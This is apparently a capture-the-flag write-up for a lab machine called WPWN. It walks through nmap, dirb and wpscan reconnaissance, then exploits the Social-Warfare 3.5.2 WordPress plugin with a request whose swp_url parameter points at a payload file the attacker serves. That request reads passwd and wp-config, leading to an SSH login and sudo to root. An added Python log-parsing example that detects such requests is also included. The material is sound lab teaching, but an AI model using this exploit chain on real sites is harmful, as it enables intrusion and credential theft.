root@blog:~#


WPWN

RECON

IP Search
Our IP leads us to a blank page, so let's move on to scanning.
Nmap Scan

nmap -sV -sC 192.168.55.123

-sV enables service version detection; -sC runs the default scripts.
Ports 22 and 80 are open.
Scan for hidden directories (dirb)

dirb http://192.168.55.123

WordPress Page
Scan for WordPress vulnerabilities

wpscan --url http://192.168.55.123/wordpress/

The scan reveals an outdated plugin named Social-Warfare 3.5.2.
This vulnerability allows commands to run, which can be used to obtain user credentials.
Payload File
The payload shows the contents of the passwd file.

Python Simple server

 python3 -m http.server 80


ENUMERATION

Visit Website

 http://192.168.55.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://localhost/payload.txt

User Takis is revealed
Config.php
The WordPress config.php holds important information. The payload can be used to read it.
Visit Website
Viewing the source reveals a password for a SQL database
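
A defender's view of the admin-post.php request above, as an added example that is not part of the original write-up: a log check that flags any request carrying both swp_debug and swp_url, the parameters used here against Social-Warfare 3.5.2. The log lines, client addresses and the function name find_swp_requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://198.51.100.5/payload.txt HTTP/1.1" 500 0 "-" "curl/8.0"
198.51.100.20 - - [01/Jan/2024:10:01:00 +0000] "POST /wordpress/wp-admin/admin-post.php?action=contact HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:10:02:30 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http%3A%2F%2Flocalhost%2Fpayload.txt HTTP/1.1" 200 812 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def find_swp_requests(log_text):
    """Return one dict per admin-post.php request that sets both swp_debug and swp_url."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected log format
        client, when, method, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        # parse_qs percent-decodes values, so encoded swp_url values are caught too
        params = {k: v[0] for k, v in parse_qs(url.query).items()}
        if "swp_debug" in params and "swp_url" in params:
            hits.append({
                "client": client,
                "time": when,
                "status": int(status),
                "swp_url": params["swp_url"],
                # host the plugin was asked to fetch the options file from
                "fetch_host": urlsplit(params["swp_url"]).hostname,
            })
    return hits

if __name__ == "__main__":
    for hit in find_swp_requests(SAMPLE_LOG):
        print(hit)
```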

Privilege Escalation

Server SSH

 sudo ssh takis@192.168.55.123

User Flag
local.txt
Check User Privileges

Root Escalation

Root Flag

sudo su
